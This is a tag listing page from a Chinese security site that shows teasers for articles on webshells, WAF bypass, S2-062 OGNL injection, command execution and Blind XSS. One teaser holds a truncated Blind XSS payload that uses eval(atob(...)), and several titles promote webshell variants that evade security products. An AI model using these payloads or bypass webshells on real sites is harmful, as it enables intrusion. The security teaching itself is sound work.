eval - 第 18 | CN-SEC 中文网

安全文章

Ruby安全漫谈

V-lab实验室随着Ruby越来越流行，Ruby相关的安全问题也逐渐暴露，目前，国内专门介绍Ruby安全的文章较少，本文结合笔者所了解的Ruby安全知识点以及挖掘到的Ruby相关漏洞进行描述，希望能给...

08月28日70 views评论

阅读全文

安全文章

Web安全-一句话木马总结

概述在很多的渗透过程中，渗透人员会上传一句话木马（简称Webshell）到目前web服务目录继而提权获取系统权限，不论asp、php、jsp、aspx都是如此，那么一句话木马到底是什么呢?先来看看最简...

07月30日637 views评论

阅读全文

安全文章

S2-062漏洞原理分析

S2-062漏洞形成的原因是struts在处理标签的name属性时，将用户输入当作表达式进行二次解释，导致OGNL表达式注入。和S2-061/S2-059类似，不过S2-061和S2-05...

07月27日219 views评论

阅读全文

安全文章

渗透干货｜史上最全一句话木马

目录PHP 普通一句话 PHP系列过狗一句话 PHP过狗几个变性的php--过防火墙 phpv9 高版本拿shellASP asp 一句话 ASP过安全狗一句话 ASPX系列 aspx一句话JSP...

07月25日303 views评论

阅读全文

安全文章

实战|记一次iis+aspx环境下利用http参数污染绕过waf

环境介绍Server: Microsoft-IIS/10.0X-AspNet-Version: 4.0.waf：某不知名waf漏洞点情况新建模板处，可以直接写入内容到文件：但是一写入正常的aspx语句...

07月18日73 views评论

阅读全文

安全闲碎

URLMon应用实践(5)：阒寂无声，网页暗链的自动化识别

0 系统概况 &nb...

07月11日67 views评论

阅读全文

安全文章

代码执行和命令执行

代码执行代码执行:未严格过滤用户输入的参数,导致用户可以通过传参在web服务器上执行恶意代码.可变函数:一个变量名后面如果有圆括号,php将寻找与变量值同名的函数并尝试执行.evaleval:将一个字...

07月06日112 views评论

阅读全文

安全文章

干货｜史上最全一句话木马

一句话木马目录PHP 普通一句话 PHP系列过狗一句话 PHP过狗几个变性的php--过防火墙 phpv9 高版本拿shellASP asp 一句话 ASP过安全狗一句话 ASPX系列 aspx一...

07月02日51 views已关闭评论

阅读全文

安全文章

Python在线编程导致命令执行（二）

之前的案例《某Python学习网站在线编码导致命令执行》漏洞修复后再次绕过的两种方法。测试仍以黑名单形式过滤关键字。且只过滤用户输入，并未影响到运行时。思路：这种过滤使用混淆(字符拼接、编码等)即...

06月26日96 views评论

阅读全文

史上最全一句话木马

目录PHP 普通一句话 PHP系列过狗一句话 PHP过狗几个变性的php--过防火墙 phpv9 高版本拿shellASP asp 一句话 ASP过安全狗一句话 ASPX系列 aspx一句话JSP...

06月22日安全文章380 views评论

阅读全文

安全文章

Blind XSS

Payload："><input onfocus=eval(atob(http://this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCg...

06月07日29 views评论

阅读全文

应急响应

Linux 应急响应

一. 账户安全 /etc/passwd /etc/shadow 格式：用户名：密码：用户ID：组ID：用户说明：家（home）目录：登陆之后shell 注意：无密码只允许本机登陆，远程不允许ssh登陆...

05月23日22 views评论

阅读全文

Ruby安全漫谈

Web安全-一句话木马总结

S2-062漏洞原理分析

渗透干货｜史上最全一句话木马

实战|记一次iis+aspx环境下利用http参数污染绕过waf

URLMon应用实践(5)：阒寂无声，网页暗链的自动化识别

代码执行和命令执行

干货｜史上最全一句话木马

Python在线编程导致命令执行（二）

史上最全一句话木马

Blind XSS

在线咨询

微信